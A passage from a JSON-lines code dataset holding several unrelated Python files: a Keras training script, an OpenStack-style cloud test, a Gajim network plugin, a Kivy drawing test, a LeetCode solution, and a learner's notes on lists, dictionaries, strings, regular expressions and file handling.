= np.reshape(y, newshape=(-1,1))\r\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.1)\r\n\r\n num_features = x_train.shape[1]\r\n num_targets = y_train.shape[1]\r\n\r\n # building the model\r\n model = build_model(num_features, num_targets)\r\n\r\n #setting the optimizer options\r\n opt = Adam(learning_rate = 0.001)\r\n\r\n # compile the model\r\n model.compile(\r\n loss = \"mae\",\r\n optimizer = opt,\r\n metrics = [RootMeanSquaredError()]\r\n )\r\n\r\n #train the model\r\n history = model.fit(\r\n x = x_train,\r\n y = y_train,\r\n epochs = 500,\r\n batch_size = 256,\r\n verbose = 1,\r\n validation_data = (x_test, y_test)\r\n )\r\n\r\n #evaluate the model\r\n scores = model.evaluate(\r\n x = x_test,\r\n y = y_test,\r\n verbose = 0,\r\n )\r\n\r\n # issue a prediction for the plot of quality of prediction\r\n y_pred = model.predict(x_test).flatten()\r\n plot_prediction(y_test, y_pred)\r\n plot_loss(history)\r\n print(scores)\r\n #save model\r\n model.save(\"C:/Users/Mario/OneDrive/Universität/Semester 8 21 SoSe/PIR/Material/Subsonic/models/cd.h5\")","sub_path":"Scripts/Keras/KerasCd.py","file_name":"KerasCd.py","file_ext":"py","file_size_in_byte":5466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"293545387","text":"\"\"\"\nCopyright 2015 Rackspace\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, 
software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nfrom cafe.drivers.unittest.decorators import tags\nfrom cloudcafe.common.tools.datagen import rand_name\nfrom cloudcafe.compute.common.types import NovaServerStatusTypes\n\nfrom cloudroast.compute.fixtures import ServerFromVolumeV1Fixture\n\n\nclass CreateVolumeServerfromSnapshotTest(ServerFromVolumeV1Fixture):\n\n @classmethod\n def setUpClass(cls):\n \"\"\"\n Perform actions that setup the necessary resources for testing.\n\n The following resources are created during this setup:\n - Creates an active server.\n - Creates an available volume from CBS.\n - Creates an available snapshot.\n - Creates an active image.\n - Creates an available volume from snapshot.\n - Creates an available volume from CBS snapshot.\n \"\"\"\n super(CreateVolumeServerfromSnapshotTest, cls).setUpClass()\n cls.server = cls.server_behaviors.create_active_server().entity\n\n # Creating volume for CBS snapshot scenario\n cls.volume_sec = cls.blockstorage_behavior.create_available_volume(\n size=cls.volume_size, volume_type=cls.volume_type,\n image_ref=cls.image_ref, timeout=cls.volume_create_timeout)\n\n # Creating Snapshot\n cls.snapshot = cls.blockstorage_behavior.create_available_snapshot(\n volume_id=cls.volume_sec.id_)\n\n # Creating glance image from the server\n cls.image = cls.image_behaviors.create_active_image(cls.server.id).entity\n\n # Create Volume from the Image Snapshot\n cls.volume = cls.blockstorage_behavior.create_available_volume(\n size=cls.volume_size, volume_type=cls.volume_type,\n image_ref=cls.image.id, timeout=cls.volume_create_timeout)\n\n # Create Volume from the Snapshot CBS Scenario\n cls.snap_volume = cls.blockstorage_behavior.create_available_volume(\n size=cls.volume_size, volume_type=cls.volume_type,\n snapshot_id=cls.snapshot.id_,\n timeout=cls.volume_create_timeout)\n\n # Clean-up\n cls.resources.add(cls.server.id, cls.servers_client.delete_server)\n cls.resources.add(cls.image.id, cls.images_client.delete_image)\n cls.resources.add(cls.volume.id_,\n cls.blockstorage_client.delete_volume)\n cls.resources.add(cls.volume_sec.id_,\n cls.blockstorage_client.delete_volume)\n cls.resources.add(cls.snap_volume.id_,\n cls.blockstorage_client.delete_volume)\n cls.addClassCleanup(\n cls.blockstorage_behavior.delete_snapshot_confirmed,\n cls.snapshot.id_)\n\n @tags(type='smoke', net='no')\n def test_create_volume_server_from_image_snapshot(self):\n \"\"\"\n Verify the creation of volume server from image snapshot.\n\n Will create a block device mapping and an active server. 
Then\n verify that the response code is ok and waits for the server to\n become active.\n\n The following assertions occur:\n - 200 status code returned from the crete server call.\n \"\"\"\n # Creating block device with volume from glance snapshot data inside\n self.block_data = self.server_behaviors.create_block_device_mapping_v1(\n volume_id=self.volume.id_,\n device_name=self.images_config.primary_image_default_device,\n size=self.volume_size,\n type='',\n delete_on_termination=True)\n # Creating Instance from Volume V1\n self.server_response = self.server_behaviors.create_active_server(\n block_device_mapping=self.block_data,\n flavor_ref=self.flavors_config.primary_flavor,\n name=rand_name(\"server\"))\n # Verify response code is correct\n self.assertEqual(self.server_response.status_code, 202)\n # Verify the server reaches active status\n wait_response = self.server_behaviors.wait_for_server_status(\n self.server_response.entity.id, NovaServerStatusTypes.ACTIVE)\n self.volume_server = wait_response.entity\n\n @tags(type='smoke', net='no')\n def test_create_volume_server_from_volume_snapshot(self):\n \"\"\"\n Verify the creation of volume server from volume snapshot.\n\n Will create a block device mapping and an active server. Then\n verify that the response code is ok and waits for the server to\n become active.\n\n The following assertions occur:\n - 200 status code returned from the crete server call.\n \"\"\"\n # Creating block device with snapshot data inside\n self.block_data = self.server_behaviors.create_block_device_mapping_v1(\n volume_id=self.snap_volume.id_,\n device_name=self.images_config.primary_image_default_device,\n size=self.volume_size,\n type='snap',\n delete_on_termination=True)\n # Creating Instance from Volume V1\n self.server_response = self.server_behaviors.create_active_server(\n block_device_mapping=self.block_data,\n flavor_ref=self.flavors_config.primary_flavor,\n name=rand_name(\"server\"))\n # Verify response code is correct\n self.assertEqual(self.server_response.status_code, 202)\n # Verify the server reaches active status\n self.server_behaviors.wait_for_server_status(\n self.server_response.entity.id, NovaServerStatusTypes.ACTIVE)\n","sub_path":"cloudroast/compute/integration/volumes/boot_from_volume/v1/images/test_volume_server_from_snapshot.py","file_name":"test_volume_server_from_snapshot.py","file_ext":"py","file_size_in_byte":6013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"327286293","text":"import os\n\nfrom gajim.common import app\nfrom gajim.common import dbus_support\n\nfrom gajim.plugins import GajimPlugin\nfrom gajim.plugins.helpers import log_calls\nfrom gajim.plugins.plugins_i18n import _\n\n\nclass WicdPlugin(GajimPlugin):\n @log_calls('WicdPlugin')\n def init(self):\n self.description = _(\n 'Support for autodetection of network status '\n 'for Wicd Network Manager.\\nRequires wicd and python-dbus.')\n self.config_dialog = None\n self.test_activatable()\n\n def test_activatable(self):\n self.available_text = ''\n if os.name == 'nt':\n self.available_text = _('Plugin can\\'t be run under Windows.')\n self.activatable = False\n return\n if not dbus_support.supported:\n self.activatable = False\n self.available_text += _('python-dbus is missing! 
'\n 'Install python-dbus.')\n\n @log_calls('WicdPlugin')\n def activate(self):\n try:\n import dbus\n from gajim.common.dbus_support import system_bus\n\n self.bus = system_bus.bus()\n\n if 'org.wicd.daemon' not in self.bus.list_names():\n return\n wicd_object = self.bus.get_object('org.wicd.daemon',\n '/org/wicd/daemon')\n self.props = dbus.Interface(wicd_object,\n 'org.freedesktop.DBus.Properties')\n self.bus.add_signal_receiver(self.state_changed,\n 'StatusChanged',\n 'org.wicd.daemon',\n 'org.wicd.daemon',\n '/org/wicd/daemon')\n except dbus.DBusException:\n pass\n\n @log_calls('WicdPlugin')\n def deactivate(self):\n self.bus.remove_signal_receiver(self.state_changed,\n 'StatusChanged',\n 'org.wicd.daemon',\n 'org.wicd.daemon',\n '/org/wicd/daemon')\n\n def state_changed(self, state, _info):\n # Connection state constants\n # NOT_CONNECTED = 0\n # CONNECTING = 1\n # WIRELESS = 2\n # WIRED = 3\n # SUSPENDED = 4\n if state in (2, 3):\n for connection in app.connections.values():\n if app.config.get_per('accounts', connection.name,\n 'listen_to_network_manager') and connection.time_to_reconnect:\n connection._reconnect()\n else:\n for connection in app.connections.values():\n if app.config.get_per('accounts', connection.name,\n 'listen_to_network_manager') and connection.connected > 1:\n connection._disconnectedReconnCB()\n","sub_path":"wicd_support/wicd_support.py","file_name":"wicd_support.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"331109129","text":"from kivy.app import App\r\nfrom kivy.uix.boxlayout import BoxLayout\r\nfrom kivy.graphics import Line, Color\r\nfrom kivy.clock import Clock\r\nimport colorsys\r\nimport time\r\n\r\n\r\nclass Main(BoxLayout):\r\n\r\n count = 0\r\n\r\n def __init__(self, **kwargs):\r\n super().__init__(**kwargs)\r\n Clock.schedule_interval(self.execute, 1 / 30)\r\n\r\n def execute(self, dt):\r\n start = time.time()\r\n width = self.panel.size[0]\r\n points = [0] * 200000\r\n for i in range(0, 200000, 2):\r\n points[i] = i % width\r\n points[i + 1] = i / 10\r\n self.panel.canvas.clear()\r\n self.count += 1\r\n r, g, b = colorsys.hsv_to_rgb(self.count / 256, 1.0, 1.0)\r\n with self.panel.canvas:\r\n Color(r, g, b, 1.0)\r\n Line(points=points, width=1)\r\n self.time = time.time() - start\r\n\r\n def export(self):\r\n self.panel.export_to_png('test.png')\r\n\r\n\r\nclass TestApp(App):\r\n\r\n def build(self):\r\n return Main()\r\n\r\n\r\nif __name__ == '__main__':\r\n from kivy.config import Config\r\n Config.set('graphics', 'fullscreen', 'auto')\r\n TestApp().run()\r\n","sub_path":"python/canvas/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"131200662","text":"class Solution(object):\n def maxProfit(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n min_price = prices[0]\n profit = 0\n\n for price in prices:\n min_price = min(min_price, price)\n profit = max(profit, price - min_price)\n\n return profit\n\ns=Solution()\nprint(s.maxProfit(prices = [7,1,5,3,6,4]))\n","sub_path":"python/121_best_time_to_buy_and_sell_stocks.py","file_name":"121_best_time_to_buy_and_sell_stocks.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"550549414","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 29 14:12:56 
2020\n\n@author: Matthew\n\"\"\"\n\n#Continuing Automate The Boring Stuff\n#Chapter 4 - Lists\nspam = ['cat', 'bat', 'duck']\nspam[1]\nspam[0]\n#lists in lists\nspam2 = [['cat', 'bat', 'duck'], [1, 2, 3, 4]]\nspam2[1][2]\n#negative indices start from the last\nspam2[0][-1]\n#slices of lists\nspam2[0][0:2]\n# 'up to but not including the last number' - ex. not 'duck'\nlen(spam2[0])\n#Assigning\nspam2[0][1] = 'potato'\n#can overwrite entire list if syntax is off\nspam2[0] = 'gone'\nprint(spam2)\n#deletions\ndel spam2[1][2]\n#Ex program\ncatNames = []\nwhile True:\n print('Enter the name of cat' + str(len(catNames)+1)+\n ' (Or enter nothing to stop.):')\n name = input()\n if name =='':\n break\n catNames = catNames + [name] #list concatenation\nprint('The cat names are:')\nfor name in catNames:\n print(' '+ name)\n# loops and lists\nsupplies = ['pens', 'staplers', 'flame-throwers', 'binders']\nfor i in range(len(supplies)):\n print('Index' + str(i) + 'in supplies is : ' + supplies[i])\n#in and not in\nprint(spam2)\n'cat' in spam2[0] #True\n'dog' in spam2[0] #False\n#example program\nmyPets = ['Zophie', 'Pooka', 'Fat-tail']\nprint('Enter a pet name:')\nname = input()\nif name not in myPets:\n print('I do not have a pet named ' + name)\nelse:\n print(name + ' is my pet.')\n#Multiple assignment trick - thb dont understand this one.\ncat = ['fat', 'black', 'loud']\nsize, color, disposition = cat\n#Methods - similar to function but it will be 'called on' a value.\nspam = ['hello', 'hi', 'howdy', 'heyas']\nspam.index('heyas')\n#if duplicates, displays the first position in a list\nspam = ['hello', 'hi', 'hello', 'howdy', 'heyas']\nspam.index('hello')\n# .append() - on the end\nspam.append('potato')\n#insert(#position, list)\nspam.insert(2, 'oregano')\n#both insert and append are only applicable on lists []\nspam.remove('hello')\n#also just removes the 1st instance of a value\n# del() if you know the position you want to remove, remove() if you know the value\n#sort() integers and flaots low to high, strings alphabetical \nspam.sort()\nspam\n#alternatively\nspam.sort(reverse=True)\nspam\n#is case sensitive, all caps will be sorted, followed by all lowercase\n#simplified 8 ball program\nimport random\nmessages = ['It is certain',\n 'It is decidedly so',\n 'Yes definitely',\n 'Reply hazy try again',\n 'Ask again later',\n 'Concentrate and ask again',\n 'My reply is no',\n 'Outlook not so good',\n 'Very doubtful']\nprint(messages[random.randint(0, len(messages) - 1)])\n#strings are essentially lists at the end of the day, ex: \nname = 'Zophia'\nname[1]\nfor i in name:\n print('***'+ i +'***')\n\n#testing the updating of things on github across both computers\n#tuples are lists that are immutable - cant be modified - like strings\n#Used with round brackets ()\neggs = ('hello', 42, 0.4)\n#trailing comma indicates a tuple instead of a regular value\nfish = (2,) #tuple\nfish = (2) #integer value, equivalent to fish = 2 \n#ordered sequence that dont change - use a tuple\n#tuples and lists can be converted between each other\nfish = (2,3,4,5)\nfish2 = list((2,3,4,5))\nfish2\n#assigning a variable to a list is a reference to the list,\n#not the actual list itself, EX:\nspam = [1,2,3,4,5]\ncheese = spam\ncheese[1] = 'hello'\nspam\n# they both refer to the same list, not the case with tuples\n#the variable assigned to a tuple IS the tuple\n#Passing reference:\ndef eggs(someParameter):\n someParameter.append('Hello')\nspam = [1,3,4]\neggs(spam)\nprint(spam)\n#making true copys:\nimport copy\nspam = 
['A','B','C','D']\ncheese = copy.copy(spam)\ncheese[2] = 43\nspam\ncheese\n#2 different lists like you would expect with other data types\n#copy.deepcopy() will do the same with lists that contain internal lists\n\n#practice problems ch4\n\ndef stringy(string):\n st = ''\n for i in range(len(string)):\n if i > 0:\n if i == len(string) -1:\n st = st + ' and '\n else:\n st = st + ', '\n st = st + string[i];\n return st\nspam = ['apples', 'bananas', 'tofu', 'cats']\nstringy(spam)\n#problem 2\ngrid = [['.', '.', '.', '.', '.', '.'],\n ['.', 'O', 'O', '.', '.', '.'],\n ['O', 'O', 'O', 'O', '.', '.'],\n ['O', 'O', 'O', 'O', 'O', '.'],\n ['.', 'O', 'O', 'O', 'O', 'O'],\n ['O', 'O', 'O', 'O', 'O', '.'],\n ['O', 'O', 'O', 'O', '.', '.'],\n ['.', 'O', 'O', '.', '.', '.'],\n ['.', '.', '.', '.', '.', '.']]\n\ndef layer(row):\n for j in range(len(row[0])):\n for i in range(len(row)):\n print(row[i][j], end = '')\n print('')\nlayer(grid)\n#end ch4\n\n#start chapter 5 - Dictionaries and Structuring Data\n#Dictionaries - indexed with keys > key-value pairs\nmyCat = {'size': 'fat', 'colour': 'grey', 'disposition': 'loud'}\n#size, colour, disposition are the keys, all associated with their values\nmyCat['size']\n'My cat has ' + myCat['colour'] + ' fur.'\n#can use integers as keys as well. Can be any number\nspam = {12345: 'Luggage Combination', 42: 'The Answer'}\n#dictionaries are not ordered like lists or tuples\n#therefore cant be sliced\nbirthdays = {'Alice': 'Apr 1', 'Bob': 'Dec 12', 'Carol': 'Mar 4'}\nwhile True:\n print('Enter a name: (Blank to quit)')\n name = input()\n if name == '':\n break\n if name in birthdays:\n print(birthdays[name] + ' is the birthday of ' +name)\n else:\n print('I do not have birthday information for ' + name)\n print('What is their birthday?')\n bday = input()\n birthdays[name] = bday\n print('Birthday database updated')\n#this data does not get saved permanently in the dictionary - will be taught later in the book\n#keys(), values(), items()\nspam = {'colour': 'red', 'age': 42}\nfor v in spam.values():\n print(v)\nfor k in spam.items():\n print(k)\n#more multiple assignment things\nfor k, v in spam.items():\n print('Key: '+ k + ' Value: ' + str(v))\n#can still use in and not in to check for stuff in the dictionary\nspam = {'name': 'Zophie', 'age': 7}\n'name' in spam.keys()\n'color' not in spam.keys()\n'Zophie' in spam.values()\n#get()\npicnicItems = {'apples': 5, 'cups': 2} \n#inserting a default fallback value if the key is missing (0 in this case)\n'I am bringing ' + str(picnicItems.get('cups', 0)) + ' cups.'\n'I am bringing ' + str(picnicItems.get('eggs', 0)) + ' eggs.'\n#setdefault() - only if that key doesnt have a value\nspam = {'name': 'Pooka', 'Age': 5}\nif 'colour' not in spam:\n spam['colour'] = 'black'\n#setdefault condenses this down to 1 line\nspam = {'name': 'Pooka', 'Age': 5}\nspam.setdefault('colour', 'black')\nspam\n#setdefault ensures that a key exists\nmessage = 'It was a bright cold day in April, and the clocks were striking thirteen.'\ncount = {}\nfor character in message:\n count.setdefault(character, 0)\n count[character] = count[character] + 1\nprint(count)\n#Pretty Print with pprint() and pformat()\nimport pprint\nmessage = 'It was a bright cold day in April, and the clocks were striking thirteen.'\ncount = {}\nfor character in message:\n count.setdefault(character, 0)\n count[character] = count[character] + 1\npprint.pprint(count)\n#sorts keys, adds newlines, way cleaner\n#pprint.pformat() makes it into a 
string\nprint(pprint.pformat(count))\n#modeling tic tac toe with a dictionary\ntheBoard = {'top-L': ' ', 'top-M': ' ', 'top-R': ' ',\n 'mid-L': ' ', 'mid-M': ' ', 'mid-R': ' ',\n 'low-L': ' ', 'low-M': ' ', 'low-R': ' '}\ndef printBoard(board):\n print(board['top-L'] + '|' + board['top-M'] + '|' + board['top-R'])\n print('-+-+-')\n print(board['mid-L'] + '|' + board['mid-M'] + '|' + board['mid-R'])\n print('-+-+-')\n print(board['low-L'] + '|' + board['low-M'] + '|' + board['low-R'])\nprintBoard(theBoard)\nturn = 'X'\nfor i in range(9):\n printBoard(theBoard)\n print('Turn for ' + turn + '. Move on which space?')\n move = input()\n theBoard[move] = turn\n if turn == 'X':\n turn = 'O'\n else:\n turn = 'X'\nprintBoard(theBoard)\n#simple dictionary pairings between single places and a state\n#can do nested dictionaries for more complicated situations\nallGuests = {'Alice': {'apples': 5, 'Pretzels':12},\n 'Bob': {'ham sandwiches': 3, 'apples': 2},\n 'Carol': {'cups': 3, 'apple pies': 1}}\ndef totalBrought(guests, item):\n numBrought = 0\n for k, v in guests.items():\n numBrought = numBrought + v.get(item, 0)\n return numBrought\n\nprint('Number of things being brought:')\nprint(' - Apples ' + str(totalBrought(allGuests, 'apples')))\nprint(' - Cups ' + str(totalBrought(allGuests, 'cups')))\nprint(' - Cakes ' + str(totalBrought(allGuests, 'cakes')))\nprint(' - Ham Sandwiches ' + str(totalBrought(allGuests, 'ham sandwiches')))\nprint(' - Apple Pies ' + str(totalBrought(allGuests, 'apple pies')))\n#dumb for this purpose, but can be extended to thousands of entries\n#end chapter 5, didnt do the practice problems, so much typing, little thinking\n\n#Chapter 6 - Manipulating Strings\n#manipulating strings\nspam = 'Say hi to Bob\\'s mother' \n#escape character \\ to allow the ' without ending the string\n# Escape character Prints as\n# \\' Single quote\n# \\\" Double quote\n# \\t Tab\n# \\n Newline (line break)\n# \\\\ Backslash\nprint(\"Hello there! \\nHow are you?\\nI\\'m doing fine.\")\n#raw strings (r...) 
completely ignore all escape characters\nprint(r'That is Carol\\'s cat.')\n#triple quotes for multiline strings\nprint('''Dear Alice,\n \nEve's cat has been arrested for catnapping, cat burglary, and extortion.\n\nSincerely,\nBob''')\n# includes the newlines as part of the string, alt:\nprint('Dear Alice,\\n\\nEve\\'s cat has been arrested for catnapping, cat burglary, and extortion.\\n\\nSincerely,\\nBob')\n#useful string methods\nspam = 'Hello world!'\nspam = spam.upper()\nspam\nspam = spam.lower()\nspam\n#these call new strings, not directly modifying the original\nprint('How are you?')\nfeeling = input()\nif feeling.lower() == 'great':\n print('I feel great too!')\nelse:\n print('I hope the rest of your day is good.')\n#putting input into lowercase allows you to accomodate case insensitivity\n#isupper() and islower() allow you to test what a string is.\n#will return a True/False value\n#other isX() calls:\n#isalpha() # is the string only letters?\n#isalnum() # is the string only letters and numbers?\n#isdecimal() # is the string only numbers?\nwhile True:\n print('Enter your age:')\n age = input()\n if age.isdecimal():\n break\n print('Please enter a number for your age.')\nwhile True:\n print('Select a new password (letters and numbers only):')\n password = input()\n if password.isalnum():\n break\n print('Passwords can only have letters and numbers.')\n#startswith() and endswith() - self explanatory methods\n# .join() and .split() switch strings and lists, ex:\n'My name is Simon'.split()\n' '.join(['My', 'name', 'is', 'Simon'])\n'ABC'.join(['My', 'name', 'is', 'Simon'])\n'MyABCnameABCisABCSimon'.split('ABC')\n#Justifying text with - rjust(), ljust(), center()\n'Hello'.rjust(10)\n'Hello'.rjust(20)\n'Hello World'.rjust(20,'*')\n'Hello'.ljust(10, 'p')\n#use things like this to make pretty outputs of data\ndef printPicnic(itemsDict, leftWidth, rightWidth):\n print('PICNIC ITEMS'.center(leftWidth + rightWidth, '-'))\n for k, v in itemsDict.items():\n print(k.ljust(leftWidth, '.') + str(v).rjust(rightWidth))\npicnicItems = {'sandwiches': 4, 'apples': 12, 'cups': 4, 'cookies': 8000}\nprintPicnic(picnicItems, 12, 5)\nprintPicnic(picnicItems, 20, 6)\n#Removing Whitespace with strip(), rstrip(), and lstrip()\n\n#Table Printer Practice Project\n\ntableData = [['apples', 'oranges', 'cherries', 'banana'],\n['Alice', 'Bob', 'Carol', 'David'],\n['dogs', 'cats', 'moose', 'goose']]\n\ndef printTable(doggo):\n colL = [0] * len(doggo) \n for j in range(len(doggo)):\n for i in range(len(doggo[j])):\n if len(doggo[j][i]) > colL[j]:\n colL[i] = len(doggo[j][i])\n for y in range(len(doggo[0])):\n for x in range(len(doggo)):\n print(doggo[x][y].rjust(colL[x]), end = '')\n print('')\n\nprintTable(tableData)\n#good enough\n\n#Part 2 of the book: Automating Tasks\n\n#Chapter 7\n#Pattern matching with regular expressions\n# used for searching for things that are in a consistent format,\n#like phone numbers, emails, etc. \n#///\n#Finding patterns without regular expressions\ndef isPhoneNumber(text):\n if len(text) !=12:\n return False\n for i in range(0, 3):\n if not text[i].isdecimal():\n return False\n if text[3] != '-':\n return False\n for i in range(4, 7):\n if not text[i].isdecimal():\n return False\n if text[7] != '-':\n return False\n for i in range(8, 12):\n if not text[i].isdecimal():\n return False\n return True\nprint(isPhoneNumber('495-635-5453')) \nprint(isPhoneNumber('moshi moshi'))\n#test\nmessage = 'Call me at 415-555-1011 tomorrow. 
415-555-9999 is my office.'\nfor i in range(len(message)):\n chunk = message[i:i+12]\n if isPhoneNumber(chunk):\n print('Phone number found: ' + chunk)\nprint('Done')\n#now with regular expressions\nimport re\nphoneNumRegex = re.compile(r'\\d\\d\\d-\\d\\d\\d-\\d\\d\\d\\d') # remember '(r' makes it a raw string\n#regular expressions frequently use \\ so passing raw strings save \\\\ each time\n#.search() looks in a string it is passed for the regex patters\nmo = phoneNumRegex.search('My number is 415-555-4242.')\nprint('Phone number found: ' + mo.group())\nphoneNumRegex = re.compile(r'(\\d\\d\\d)-(\\d\\d\\d-\\d\\d\\d\\d)')\nmo = phoneNumRegex.search('My number is 415-555-4242')\nmo.group(1)\nmo.group(2)\nmo.group(0)\nmo.group()\nmo.groups()\nareaCode, mainNumber = mo.groups()\nprint(areaCode)\nprint(mainNumber)\n#if area code in ()\nphoneNumRegex = re.compile(r'(\\(\\d\\d\\d\\)) (\\d\\d\\d-\\d\\d\\d\\d)')\nmo = phoneNumRegex.search('My number is (415) 555-4242')\nmo.group(1)\n#matching multiple groups with the pipe |, essentially 'this' or 'this'\nheroRegex = re.compile(r'Batman|Tina Fey')\nmo1 = heroRegex.search('Batman and Tina Fey')\nmo1.group()\n#if a string has both, will always be the first of the 2 incidents\n#specifying a prefix\nbatRegex = re.compile(r'Bat(man|mobile|copter|bat)')\nmo = batRegex.search('Batmobile lost a wheel')\nmo.group()\n#optional matching with a ?\nbatRegex = re.compile(r'Bat(wo)?man')\nmo1 = batRegex.search('The Adventures of Batman')\nmo1.group()\nmo2 = batRegex.search('The Adventures of Batwoman')\nmo2.group()\n#(wo)? means that part of the string is optional in the search\n#relate to finding phone numbers with or without a area code\nphoneRegex = re.compile(r'(\\d\\d\\d-)?\\d\\d\\d-\\d\\d\\d\\d')\nmo1 = phoneRegex.search('My number is 415-555-4242')\nmo1.group()\nmo2 = phoneRegex.search('My number is 555-4242')\nmo2.group()\n# a * can be used as a optional OR multiple segment search. 0 or more\nbatRegex = re.compile(r'Bat(wo)*man')\nmo1 = batRegex.search('The Adventures of Batwowowowoman')\nmo1.group()\n# a + will mean 1 or more, so not 0.\n#match specific repetitions with {}\n#(ha){3} = (ha)(ha)(ha)\n#or (ha){3,5} - can match 3, 4, or 5 instances of (ha)\ngreedyHaRegex = re.compile(r'(Ha){3,5}')\nmo1 = greedyHaRegex.search('HaHaHaHaHa')\nmo1.group()\n#greedy (longest string) vs nongreedy '?' (shortest string possible)\nnongreedyHaRegex = re.compile(r'(Ha){3,5}?')\nmo2 = nongreedyHaRegex.search('HaHaHaHaHa')\nmo2.group()\n#findall() - return every match in a searched string\n# will return list of strings if no groups, or a list of tuples \n#with their component strings if there are groups\nphoneNumRegex = re.compile(r'\\d\\d\\d-\\d\\d\\d-\\d\\d\\d\\d')\nphoneNumRegex.findall('Cell: 415-555-7788 work: 212-555-0000')\n#groups -> tuples\nphoneNumRegex = re.compile(r'(\\d\\d\\d)-(\\d\\d\\d)-(\\d\\d\\d\\d)')\nphoneNumRegex.findall('Cell: 415-555-7788 work: 212-555-0000')\n\n########################\n#character classes\n#\\d Any numeric digit from 0 to 9.\n\n#\\D Any character that is not a numeric digit from 0 to 9.\n\n#\\w Any letter, numeric digit, or the underscore character.\n#(Think of this as matching “word” characters.)\n\n#\\W Any character that is not a letter, numeric digit, or the\n#underscore character.\n\n#\\s Any space, tab, or newline character. 
(Think of this as\n#matching “space” characters.)\n\n#\\S Any character that is not a space, tab, or newline.\n#########################\n\n#more stuff i skipped - highlighted chart in book for referece\n#case-insensitive matching - pass re.IGNORECASE or re.I as second argument\nrobocop = re.compile(r'robocop', re.I)\nrobocop.search('Robocop is part man, part machine, all cop.').group()\nrobocop.search('ROBOCOP protects the innocent.').group()\n#substituting string with the sub() method argument\nnamesRegex = re.compile(r'Agent \\w+')\nnamesRegex.sub('REDACTED', 'Agent Alice gave the documents to Agent Bob')\n\n#end page 163\n\n#regex can only handle 1 additional argument, can get multiple by piping\n\n#Project - create phone number and email regex from clipboard\n#skipping for now, get the idea and need to install pyperclip\nphoneRegex = re.compile(r'''(\n (\\d{3}|\\(\\d{3}\\))? ` # area code\n (\\s|-|\\.)? # separator\n \\d{3} # first 3 digits\n (\\s|-|\\.) # separator\n \\d{4} # last 4 digits\n (\\s*(ext|x|ext.)\\s*\\d{2,5})? # extension\n )''', re.VERBOSE)\n\n#skipping practice problems for now, regex's are getting dull af\n\n#Chapter 8 - Reading and Writing files (on the harddrive)\n#directories and filenames are not case-sensitive on windows.\nimport os\nos.path.join('usr','bin','spam')\n#remember that backslashes need to be escaped by another (therefore double)\nmyFiles = ['accounts.txt', 'details.csv', 'invite.docx']\nfor filename in myFiles:\n print(os.path.join('C:\\\\Users\\\\asweigart', filename))\n#current working directory\nimport os\nos.getcwd()\n#absolute vs relative paths.\n#sbsolute - always begins at root (ex. C:\\), relative related to CWD\n# .\\ = this directory, ..\\ parent directory\n#creating directories\nimport os\nos.makedirs('C:\\\\delicious\\\\walnut\\\\waffles')\n#os.path Module\nimport os\nos.path.abspath('.')\nos.path.abspath('.\\\\Scripts')\nos.path.isabs('.')\nos.path.isabs(os.path.abspath('.'))\n#?\npath = 'C:\\\\Windows\\\\System32\\\\calc.exe'\nos.path.basename(path)\nos.path.dirname(path)\n#or to get both together in a tuple\nos.path.split(path)\nos.path.getsize(path)\n#There are three steps to reading or writing files in Python.\n#1. Call the open() function to return a File object.\n#2. Call the read() or write() method on the File object.\n#3. 
Close the file by calling the close() method on the File object.\nos.getcwd() #i dont get this\nhelloFile = open('C:\\\\users\\\\matthew\\\\hello.txt')\nhelloContent = helloFile.read()\nhelloContent\n#to get a lsit of string values from the file, one for each line of text\nsonnetFile = open('sonnet29.txt')\nsonnetFile.readlines()\n#Writing Files - writing mode with 'w' (overwrites), appending with 'a'\nbaconFile = open('bacon.txt', 'w')\nbaconFile.write('Hello World!\\n')\nbaconFile.close()\nbaconFile = open('bacon.txt', 'a')\nbaconFile.write('Bacon is not a vegetable')\nbaconFile.close()\nbaconFile = open('bacon.txt')\ncontent = baconFile.read()\nbaconFile.close()\nprint(content)\n#with write() you have to add newlines to the ends manually with \\n\n#save variables with the shelve method\nimport shelve\nshelfFile = shelve.open('mydata')\ncats = ['Zophie','Pooka','Simon']\nshelfFile['cats'] =cats\nshelfFile.close()\n#shelf files dont have to be opened in read/write mode, they can do both.\n#Checking\nshelfFile = shelve.open('mydata')\ntype(shelfFile)\nshelfFile['cats']\nshelfFile.close()\n#like dictionaries, shelves have keys and values attached to them.\nshelfFile = shelve.open('mydata')\nlist(shelfFile.keys())\nlist(shelfFile.values())\nshelfFile.close()\n#saving variables with the pprint.pformat() function\nimport pprint\ncats = [{'name': 'Zophie', 'desc': 'chubby'}, {'name': 'Pooka', 'desc' : 'fluffy'}]\npprint.pformat(cats)\nfileObj = open('myCats.py', 'w') \nfileObj.write('cats = ' + pprint.pformat(cats) + '\\n')\nfileObj.close()\n#list of dictionaries stored in variable cats - retriveable even after\n#shell is closed via pprint.pformat()\n#when string is saved to a .py file, now a module that can be imported\nimport myCats\nmyCats.cats\nmyCats.cats[0]\nmyCats.cats[0]['name']\n\n#PROJECT - Random quiz questions\nimport random\n# The quiz data. 
